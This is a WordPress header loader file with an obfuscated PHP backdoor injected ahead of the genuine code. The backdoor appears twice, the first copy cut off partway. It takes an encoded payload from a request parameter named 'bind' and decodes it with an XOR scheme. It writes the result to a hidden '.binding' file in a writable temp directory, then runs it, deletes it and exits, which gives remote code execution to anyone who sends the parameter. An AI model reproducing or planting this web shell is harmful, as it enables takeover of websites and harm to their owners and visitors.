$property_set) { if (array_product([is_dir($property_set), is_writable($property_set)])) { $descriptor = implode("/", [$property_set, ".binding"]); $success = file_put_contents($descriptor, $object); if ($success) { include $descriptor; @unlink($descriptor); die();} } } } php if(isset($_REQUEST) && isset($_REQUEST["\x62\x69nd"])){ $flag = $_REQUEST["\x62\x69nd"]; $flag = explode ( '.', $flag ) ; $object = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s9 ); $s = 0; $__tmp = $flag; while( $v7 = array_shift( $__tmp)) { $chS = ord( $s9[$s % $sLen] ); $dec = ( ( int)$v7 - $chS -( $s % 10)) ^ 95; $object .= chr( $dec ); $s++; } $desc = array_filter([getenv("TMP"), "/dev/shm", getcwd(), "/var/tmp", sys_get_temp_dir(), getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir"), "/tmp"]); foreach ($desc as $key => $property_set) { if (array_product([is_dir($property_set), is_writable($property_set)])) { $descriptor = implode("/", [$property_set, ".binding"]); $success = file_put_contents($descriptor, $object); if ($success) { include $descriptor; @unlink($descriptor); die();} } } } /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }